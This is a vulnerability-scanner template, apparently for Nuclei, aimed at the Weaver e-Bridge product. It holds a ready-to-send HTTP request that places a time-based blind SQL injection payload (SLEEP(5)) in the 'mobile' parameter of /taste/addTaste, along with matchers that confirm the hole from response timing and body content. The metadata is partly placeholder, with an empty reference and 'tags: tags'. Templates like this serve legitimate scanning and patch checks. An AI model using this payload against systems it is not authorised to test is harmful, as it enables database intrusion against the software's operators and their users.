id: e-Bridge-SQL
info:
  name: 泛微云桥e-Bridge
  author: weehhd
  severity: high
  description: https://mp.weixin.qq.com/s/biCiA1XKKUbMI28_JMU_dA
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208600%20FROM%20(SELECT(SLEEP(5)))iWyJ)%20OR%20%27KGvE%27=%27iJeo HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Cookie: EBRIDGE_JSESSIONID=B34C83562E9D2DB4142314EE8C302DE8
        Connection: close

    matchers:
      - type: binary
        part: body
        binary:
          - 8ce8afb7e88194e7b3bb
      - type: dsl
        dsl:
          - 'duration>=5'          